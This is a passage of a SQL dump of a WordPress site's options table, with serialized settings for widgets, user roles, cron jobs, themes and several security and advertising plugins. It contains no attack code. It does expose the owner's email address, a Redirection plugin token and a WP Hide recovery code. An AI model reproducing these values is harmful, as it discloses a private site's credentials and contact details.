data-ad-format=\"auto\"></ins>\r\n<script>\r\n(adsbygoogle = window.adsbygoogle || []).push({});\r\n</script>\r\n\";s:6:\"filter\";b:1;s:6:\"visual\";b:1;}i:4;a:4:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:329:\"<script async src=\"//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js\"></script>\r\n<ins class=\"adsbygoogle\"\r\n     style=\"display:block\"\r\n     data-ad-client=\"ca-pub-2121528995419082\"\r\n     data-ad-slot=\"8029362605\"\r\n     data-ad-format=\"auto\"></ins>\r\n<script>\r\n(adsbygoogle = window.adsbygoogle || []).push({});\r\n</script>\r\n\";s:6:\"filter\";b:1;s:6:\"visual\";b:1;}i:5;a:4:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:141:\"Thanks to Will Brown for all his SEO help and advice, <a href=\"http://www.webmarketingplus.co.uk/consultancy.html\">Will you are a legend!</a>\";s:6:\"filter\";b:1;s:6:\"visual\";b:1;}s:12:\"_multiwidget\";i:1;}','yes'),(80,'widget_rss','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(81,'uninstall_plugins','a:5:{s:27:\"redirection/redirection.php\";a:2:{i:0;s:17:\"Redirection_Admin\";i:1;s:16:\"plugin_uninstall\";}s:33:\"import-html-pages/html-import.php\";s:26:\"html_import_remove_options\";s:59:\"ultimate-social-media-icons/ultimate_social_media_icons.php\";s:20:\"sfsi_Unistall_plugin\";s:27:\"wp-optimize/wp-optimize.php\";s:21:\"wpo_uninstall_actions\";s:23:\"wp-cerber/wp-cerber.php\";s:13:\"cerber_finito\";}','no'),(82,'timezone_string','','yes'),(83,'page_for_posts','0','yes'),(84,'page_on_front','0','yes'),(85,'default_post_format','0','yes'),(86,'link_manager_enabled','0','yes'),(87,'finished_splitting_shared_terms','1','yes'),(88,'site_icon','0','yes'),(89,'medium_large_size_w','768','yes'),(90,'medium_large_size_h','0','yes'),(91,'initial_db_version','38590','yes'),(92,'wp_user_roles','a:7:{s:13:\"administrator\";a:2:{s:4:\"name\";s:13:\"Administrator\";s:12:\"capabilities\";a:65:{s:13:\"switch_themes\";b:1;s:11:\"edit_themes\";b:1;s:16:\"activate_plugins\";b:1;s:12:\"edit_plugins\";b:1;s:10:\"edit_users\";b:1;s:10:\"edit_files\";b:1;s:14:\"manage_options\";b:1;s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:6:\"import\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:8:\"level_10\";b:1;s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:12:\"delete_users\";b:1;s:12:\"create_users\";b:1;s:17:\"unfiltered_upload\";b:1;s:14:\"edit_dashboard\";b:1;s:14:\"update_plugins\";b:1;s:14:\"delete_plugins\";b:1;s:15:\"install_plugins\";b:1;s:13:\"update_themes\";b:1;s:14:\"install_themes\";b:1;s:11:\"update_core\";b:1;s:10:\"list_users\";b:1;s:12:\"remove_users\";b:1;s:13:\"promote_users\";b:1;s:18:\"edit_theme_options\";b:1;s:13:\"delete_themes\";b:1;s:6:\"export\";b:1;s:20:\"wpseo_manage_options\";b:1;s:23:\"wf2fa_activate_2fa_self\";b:1;s:25:\"wf2fa_activate_2fa_others\";b:1;s:21:\"wf2fa_manage_settings\";b:1;}}s:6:\"editor\";a:2:{s:4:\"name\";s:6:\"Editor\";s:12:\"capabilities\";a:35:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:15:\"wpseo_bulk_edit\";b:1;}}s:6:\"author\";a:2:{s:4:\"name\";s:6:\"Author\";s:12:\"capabilities\";a:10:{s:12:\"upload_files\";b:1;s:10:\"edit_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;s:22:\"delete_published_posts\";b:1;}}s:11:\"contributor\";a:2:{s:4:\"name\";s:11:\"Contributor\";s:12:\"capabilities\";a:5:{s:10:\"edit_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;}}s:10:\"subscriber\";a:2:{s:4:\"name\";s:10:\"Subscriber\";s:12:\"capabilities\";a:2:{s:4:\"read\";b:1;s:7:\"level_0\";b:1;}}s:13:\"wpseo_manager\";a:2:{s:4:\"name\";s:11:\"SEO Manager\";s:12:\"capabilities\";a:37:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:15:\"wpseo_bulk_edit\";b:1;s:28:\"wpseo_edit_advanced_metadata\";b:1;s:20:\"wpseo_manage_options\";b:1;}}s:12:\"wpseo_editor\";a:2:{s:4:\"name\";s:10:\"SEO Editor\";s:12:\"capabilities\";a:36:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:15:\"wpseo_bulk_edit\";b:1;s:28:\"wpseo_edit_advanced_metadata\";b:1;}}}','yes'),(93,'fresh_site','0','yes'),(94,'widget_search','a:2:{i:2;a:1:{s:5:\"title\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(95,'widget_recent-posts','a:3:{i:2;a:3:{s:5:\"title\";s:0:\"\";s:6:\"number\";i:25;s:9:\"show_date\";b:0;}s:12:\"_multiwidget\";i:1;i:4;a:3:{s:5:\"title\";s:0:\"\";s:6:\"number\";i:5;s:9:\"show_date\";b:1;}}','yes'),(96,'widget_recent-comments','a:2:{i:2;a:2:{s:5:\"title\";s:0:\"\";s:6:\"number\";i:5;}s:12:\"_multiwidget\";i:1;}','yes'),(97,'widget_archives','a:2:{i:2;a:3:{s:5:\"title\";s:0:\"\";s:5:\"count\";i:1;s:8:\"dropdown\";i:0;}s:12:\"_multiwidget\";i:1;}','yes'),(98,'widget_meta','a:2:{i:2;a:1:{s:5:\"title\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(99,'sidebars_widgets','a:3:{s:19:\"wp_inactive_widgets\";a:5:{i:0;s:6:\"meta-2\";i:1;s:12:\"categories-2\";i:2;s:14:\"recent-posts-4\";i:3;s:6:\"text-5\";i:4;s:6:\"text-3\";}s:9:\"sidebar-1\";a:5:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:6:\"text-4\";i:3;s:17:\"recent-comments-2\";i:4;s:10:\"archives-2\";}s:13:\"array_version\";i:3;}','yes'),(100,'widget_pages','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(101,'widget_calendar','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(102,'widget_media_audio','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(103,'widget_media_image','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(104,'widget_media_gallery','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(105,'widget_media_video','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(106,'widget_tag_cloud','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(107,'widget_nav_menu','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(108,'widget_custom_html','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(109,'cron','a:19:{i:1640759460;a:3:{s:16:\"wp_version_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:17:\"wp_update_plugins\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:16:\"wp_update_themes\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1640759727;a:1:{s:34:\"wp_privacy_delete_old_export_files\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1640761200;a:1:{s:15:\"cerber_hourly_1\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1640761800;a:1:{s:15:\"cerber_hourly_2\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1640762311;a:1:{s:24:\"aiowps_hourly_cron_event\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1640769272;a:1:{s:30:\"wp_scheduled_auto_draft_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1640777647;a:1:{s:21:\"ai1wm_storage_cleanup\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1640780311;a:1:{s:23:\"aiowps_daily_cron_event\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1640786920;a:1:{s:18:\"wp_https_detection\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1640789470;a:1:{s:21:\"wpo_plugin_cron_tasks\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1640789472;a:1:{s:29:\"wpo_smush_clear_backup_images\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1640792895;a:1:{s:22:\"redirection_log_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1640795727;a:1:{s:32:\"recovery_mode_clean_expired_keys\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1640802687;a:2:{s:19:\"wp_scheduled_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}s:25:\"delete_expired_transients\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1640810685;a:1:{s:19:\"wpseo-reindex-links\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1640830800;a:1:{s:12:\"cerber_daily\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1640952186;a:1:{s:21:\"wpo_weekly_cron_tasks\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}i:1640968527;a:1:{s:30:\"wp_site_health_scheduled_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}s:7:\"version\";i:2;}','yes'),(110,'theme_mods_twentyseventeen','a:2:{s:18:\"custom_css_post_id\";i:-1;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1522696095;s:4:\"data\";a:4:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:6:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";i:3;s:10:\"archives-2\";i:4;s:12:\"categories-2\";i:5;s:6:\"meta-2\";}s:9:\"sidebar-2\";a:0:{}s:9:\"sidebar-3\";a:0:{}}}}','yes'),(124,'auto_core_update_notified','a:4:{s:4:\"type\";s:7:\"success\";s:5:\"email\";s:23:\"bensykes@bensykes.co.uk\";s:7:\"version\";s:5:\"5.8.2\";s:9:\"timestamp\";i:1636569073;}','no'),(143,'recently_activated','a:0:{}','yes'),(169,'widget_sfsi-widget','a:2:{s:12:\"_multiwidget\";i:1;i:3;a:0:{}}','yes'),(181,'widget_ai_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(200,'theme_mods_hive-lite','a:3:{s:18:\"custom_css_post_id\";i:-1;s:18:\"nav_menu_locations\";a:0:{}s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1522697120;s:4:\"data\";a:2:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:6:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";i:3;s:10:\"archives-2\";i:4;s:12:\"categories-2\";i:5;s:6:\"meta-2\";}}}}','yes'),(202,'current_theme','BusiCare Dark','yes'),(203,'theme_switched','','yes'),(217,'theme_mods_wp-barrister','a:1:{s:18:\"custom_css_post_id\";i:-1;}','yes'),(222,'widget_newsmagbd-slider-extended','a:2:{i:3;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(223,'theme_mods_newsmagbd','a:10:{s:18:\"custom_css_post_id\";i:-1;s:14:\"social_profile\";b:1;s:19:\"excerpt_length_blog\";i:150;s:14:\"copyright_text\";s:33:\"Copyright All right reserved 2018\";s:18:\"news_ticker_number\";i:15;s:16:\"header_textcolor\";s:6:\"000000\";s:18:\"nav_menu_locations\";a:2:{s:7:\"primary\";i:10;s:6:\"footer\";i:0;}s:29:\"newsmagbd_social_profile_link\";a:1:{s:6:\"social\";a:8:{s:11:\"fa-facebook\";s:1:\"/\";s:10:\"fa-twitter\";s:1:\"/\";s:11:\"fa-linkedin\";s:1:\"/\";s:14:\"fa-google-plus\";s:1:\"/\";s:12:\"fa-pinterest\";s:1:\"/\";s:10:\"fa-youtube\";s:1:\"/\";s:12:\"fa-instagram\";s:1:\"/\";s:9:\"fa-reddit\";s:1:\"/\";}}s:22:\"blog_loop_content_type\";s:12:\"excerpt-only\";s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1629897802;s:4:\"data\";a:5:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:5:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:6:\"text-4\";i:3;s:17:\"recent-comments-2\";i:4;s:10:\"archives-2\";}s:6:\"slider\";a:0:{}s:6:\"footer\";a:2:{i:0;s:14:\"recent-posts-4\";i:1;s:6:\"text-5\";}s:9:\"header_ad\";a:1:{i:0;s:6:\"text-3\";}}}}','yes'),(225,'theme_switched_via_customizer','','yes'),(226,'customize_stashed_theme_mods','a:0:{}','no'),(252,'redirection_options','a:31:{s:7:\"support\";b:0;s:5:\"token\";s:32:\"582b19133b4657346ca5d1ca71f4bed8\";s:12:\"monitor_post\";i:0;s:13:\"monitor_types\";a:0:{}s:19:\"associated_redirect\";s:0:\"\";s:11:\"auto_target\";s:0:\"\";s:15:\"expire_redirect\";i:7;s:10:\"expire_404\";i:7;s:7:\"modules\";a:0:{}s:10:\"newsletter\";b:0;s:14:\"redirect_cache\";i:1;s:10:\"ip_logging\";i:1;s:13:\"last_group_id\";i:1;s:8:\"rest_api\";i:0;s:5:\"https\";b:0;s:8:\"database\";s:3:\"4.2\";s:10:\"flag_query\";s:5:\"exact\";s:9:\"flag_case\";b:0;s:13:\"flag_trailing\";b:0;s:10:\"flag_regex\";b:0;s:7:\"headers\";a:0:{}s:8:\"relocate\";s:0:\"\";s:16:\"preferred_domain\";s:0:\"\";s:7:\"aliases\";a:0:{}s:12:\"log_external\";b:0;s:10:\"log_header\";b:0;s:10:\"track_hits\";b:1;s:10:\"permalinks\";a:0:{}s:9:\"cache_key\";i:0;s:13:\"plugin_update\";s:6:\"prompt\";s:13:\"update_notice\";i:0;}','yes'),(258,'wph_settings','a:4:{s:15:\"module_settings\";a:21:{s:19:\"new_style_file_path\";s:6:\"weston\";s:16:\"style_file_clean\";s:2:\"no\";s:14:\"new_theme_path\";s:5:\"temps\";s:19:\"block_wpinclude_url\";s:2:\"no\";s:16:\"new_include_path\";s:10:\"weston-inc\";s:21:\"block_wp_content_path\";s:2:\"no\";s:16:\"new_content_path\";s:11:\"weston_cont\";s:17:\"block_plugins_url\";s:3:\"yes\";s:43:\"new_plugin_path_ad-inserter-ad-inserter-php\";s:14:\"weston_script1\";s:43:\"new_plugin_path_redirection-redirection-php\";s:14:\"weston_script2\";s:75:\"new_plugin_path_ultimate-social-media-icons-ultimate_social_media_icons-php\";s:14:\"weston_script3\";s:15:\"new_plugin_path\";s:13:\"weston_script\";s:16:\"block_upload_url\";s:2:\"no\";s:15:\"new_upload_path\";s:18:\"weston_script_pics\";s:17:\"block_license_txt\";s:3:\"yes\";s:17:\"block_readme_html\";s:3:\"yes\";s:21:\"block_wp_activate_php\";s:2:\"no\";s:17:\"block_wp_cron_php\";s:2:\"no\";s:27:\"block_default_wp_signup_php\";s:2:\"no\";s:29:\"block_default_wp_register_php\";s:2:\"no\";s:20:\"block_other_wp_files\";s:2:\"no\";}s:13:\"recovery_code\";s:32:\"4a6f3f5d7c41853dbdd1b268638ab84e\";s:7:\"version\";s:7:\"1.6.1.3\";s:18:\"write_check_string\";s:16:\"1530695107_52070\";}','yes'),(261,'WPLANG','en_GB','yes'),(262,'new_admin_email','bensykes@bensykes.co.uk','yes'),(306,'ad_inserter',':AI:YTo4ODp7aToxO2E6Mjp7czoxMjoiZGlzcGxheV90eXBlIjtzOjE6IjEiO3M6MTk6ImRpc3BsYXlfb25faG9tZXBhZ2UiO3M6MToiMSI7fWk6MjthOjI6e3M6MTI6ImRpc3BsYXlfdHlwZSI7czoxOiI2IjtzOjE2OiJwYXJhZ3JhcGhfbnVtYmVyIjtzOjE6IjUiO31pOjM7YTozOntzOjEyOiJkaXNwbGF5X3R5cGUiO3M6MToiNCI7czoyNToiZGlzcGxheV9vbl9jYXRlZ29yeV9wYWdlcyI7czoxOiIxIjtzOjIzOiJkaXNwbGF5X29uX3NlYXJjaF9wYWdlcyI7czoxOiIxIjt9aToxNzthOjA6e31pOjE4O2E6MDp7fWk6MTk7YTowOnt9aToyMDthOjA6e31pOjIxO2E6MDp7fWk6MjI7YTowOnt9aToyMzthOjA6e31pOjI0O2E6MDp7fWk6MjU7YTowOnt9aToyNjthOjA6e31pOjI3O2E6MDp7fWk6Mjg7YTowOnt9aToyOTthOjA6e31pOjMwO2E6MDp7fWk6MzE7YTowOnt9aTozMjthOjA6e31pOjMzO2E6MDp7fWk6MzQ7YTowOnt9aTozNTthOjA6e31pOjM2O2E6MDp7fWk6Mzc7YTowOnt9aTozODthOjA6e31pOjM5O2E6MDp7fWk6NDA7YTowOnt9aTo0MTthOjA6e31pOjQyO2E6MDp7fWk6NDM7YTowOnt9aTo0NDthOjA6e31pOjQ1O2E6MDp7fWk6NDY7YTowOnt9aTo0NzthOjA6e31pOjQ4O2E6MDp7fWk6NDk7YTowOnt9aTo1MDthOjA6e31pOjUxO2E6MDp7fWk6NTI7YTowOnt9aTo1MzthOjA6e31pOjU0O2E6MDp7fWk6NTU7YTowOnt9aTo1NjthOjA6e31pOjU3O2E6MDp7fWk6NTg7YTowOnt9aTo1OTthOjA6e31pOjYwO2E6MDp7fWk6NjE7YTowOnt9aTo2MjthOjA6e31pOjYzO2E6MDp7fWk6NjQ7YTowOnt9aTo2NTthOjA6e31pOjY2O2E6MDp7fWk6Njc7YTowOnt9aTo2ODthOjA6e31pOjY5O2E6MDp7fWk6NzA7YTowOnt9aTo3MTthOjA6e31pOjcyO2E6MDp7fWk6NzM7YTowOnt9aTo3NDthOjA6e31pOjc1O2E6MDp7fWk6NzY7YTowOnt9aTo3NzthOjA6e31pOjc4O2E6MDp7fWk6Nzk7YTowOnt9aTo4MDthOjA6e31pOjgxO2E6MDp7fWk6ODI7YTowOnt9aTo4MzthOjA6e31pOjg0O2E6MDp7fWk6ODU7YTowOnt9aTo4NjthOjA6e31pOjg3O2E6MDp7fWk6ODg7YTowOnt9aTo4OTthOjA6e31pOjkwO2E6MDp7fWk6OTE7YTowOnt9aTo5MjthOjA6e31pOjkzO2E6MDp7fWk6OTQ7YTowOnt9aTo5NTthOjA6e31pOjk2O2E6MDp7fXM6MToiaCI7YTowOnt9czoxOiJmIjthOjA6e31zOjE6ImEiO2E6MDp7fXM6NjoiZ2xvYmFsIjthOjE0Mjp7czoyNDoiU1lOVEFYX0hJR0hMSUdIVEVSX1RIRU1FIjtzOjExOiJhZF9pbnNlcnRlciI7czo3OiJWRVJTSU9OIjtzOjY6IjAyMDYwNSI7czoxNjoiQkxPQ0tfQ0xBU1NfTkFNRSI7czoxMDoiY29kZS1ibG9jayI7czoxMToiQkxPQ0tfQ0xBU1MiO3M6MToiMSI7czoxODoiQkxPQ0tfTlVNQkVSX0NMQVNTIjtzOjE6IjEiO3M6MTY6IkJMT0NLX05BTUVfQ0xBU1MiO3M6MToiMCI7czoxMzoiSU5MSU5FX1NUWUxFUyI7czoxOiIxIjtzOjE3OiJNSU5JTVVNX1VTRVJfUk9MRSI7czoxMzoiYWRtaW5pc3RyYXRvciI7czoxODoiU1RJQ0tZX1dJREdFVF9NT0RFIjtpOjA7czoyMDoiU1RJQ0tZX1dJREdFVF9NQVJHSU4iO2k6MTU7czoxOToiTEFaWV9MT0FESU5HX09GRlNFVCI7aTo2MDA7czoxNToiTUFYX1BBR0VfQkxPQ0tTIjtpOjM7czoxNToiUExVR0lOX1BSSU9SSVRZIjtpOjk5OTk5O3M6MjI6IkNMSUNLX0ZSQVVEX1BST1RFQ1RJT04iO3M6MToiMCI7czoyNzoiQ0xJQ0tfRlJBVURfUFJPVEVDVElPTl9USU1FIjtpOjE7czoxNDoiRFlOQU1JQ19CTE9DS1MiO2k6MDtzOjI4OiJQQVJBR1JBUEhfQ09VTlRJTkdfRlVOQ1RJT05TIjtpOjA7czoxNjoiT1VUUFVUX0JVRkZFUklORyI7aTowO3M6MTU6IkRJU0FCTEVfQ0FDSElORyI7aToxO3M6MTU6IldBSVRfRk9SX0pRVUVSWSI7aToxO3M6Mjg6Ik5PX1BBUkFHUkFQSF9DT1VOVElOR19JTlNJREUiO3M6MjI6ImJsb2NrcXVvdGUsIGZpZ3VyZSwgbGkiO3M6ODoiQURfTEFCRUwiO3M6MTQ6IkFkdmVydGlzZW1lbnRzIjtzOjIwOiJNQUlOX0NPTlRFTlRfRUxFTUVOVCI7czowOiIiO3M6MTA6IkFEQl9BQ1RJT04iO2k6MDtzOjEzOiJBREJfTk9fQUNUSU9OIjtpOjA7czoxNjoiQURCX0RFTEFZX0FDVElPTiI7czowOiIiO3M6MjA6IkFEQl9OT19BQ1RJT05fUEVSSU9EIjtpOjMwO3M6MTM6IkFEQl9TRUxFQ1RPUlMiO3M6MDoiIjtzOjIwOiJBREJfUkVESVJFQ1RJT05fUEFHRSI7aTowO3M6MjY6IkFEQl9DVVNUT01fUkVESVJFQ1RJT05fVVJMIjtzOjA6IiI7czoxNToiQURCX09WRVJMQVlfQ1NTIjtzOjMyOiJiYWNrZ3JvdW5kOiAjMDAwOyBvcGFjaXR5OiAwLjg1OyI7czoxNToiQURCX01FU1NBR0VfQ1NTIjtzOjcyOiJ3aWR0aDogMzAwcHg7IHBhZGRpbmc6IDEwcHg7IGJvcmRlcjogNXB4IHNvbGlkICNmMDA7IGJvcmRlci1yYWRpdXM6IDVweDsiO3M6MjU6IkFEQl9VTkRJU01JU1NJQkxFX01FU1NBR0UiO3M6MToiMCI7czoyODoiQURCX05PX1VORElTTUlTU0lCTEVfTUVTU0FHRSI7aTowO3M6MjM6IkFETUlOX1RPT0xCQVJfREVCVUdHSU5HIjtzOjE6IjEiO3M6MjA6IkFETUlOX1RPT0xCQVJfTU9CSUxFIjtzOjE6IjAiO3M6MTk6IkZPUkNFX0FETUlOX1RPT0xCQVIiO3M6MToiMCI7czoxNjoiUkVNT1RFX0RFQlVHR0lORyI7czoxOiIwIjtzOjE5OiJESVNBQkxFX1RSQU5TTEFUSU9OIjtzOjE6IjAiO3M6MjA6IkJBQ0tFTkRfSlNfREVCVUdHSU5HIjtzOjE6IjAiO3M6MjE6IkZST05URU5EX0pTX0RFQlVHR0lORyI7czoxOiIwIjtzOjI0OiJESVNBQkxFX0JMT0NLX0lOU0VSVElPTlMiO3M6MToiMCI7czoyMjoiRElTQUJMRV9QSFBfUFJPQ0VTU0lORyI7c